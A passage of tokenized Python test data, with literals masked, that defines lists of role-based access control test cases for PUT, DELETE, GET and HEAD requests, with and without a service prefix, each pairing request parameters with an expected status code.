, None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) <EOL> ] <EOL> RBAC_PUT_WITH_SERVICE_PREFIX = [ <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ] <EOL> RBAC_DELETE = [ <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) <EOL> ] <EOL> RBAC_DELETE_WITH_SERVICE_PREFIX = [ <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) <EOL> ] <EOL> RBAC_GET = [ <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) <EOL> ] <EOL> RBAC_GET_WITH_SERVICE_PREFIX = [ <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) <EOL> ] <EOL> RBAC_HEAD = [ <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) <EOL> ] <EOL> RBAC_HEAD_WITH_SERVICE_PREFIX = [ <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> 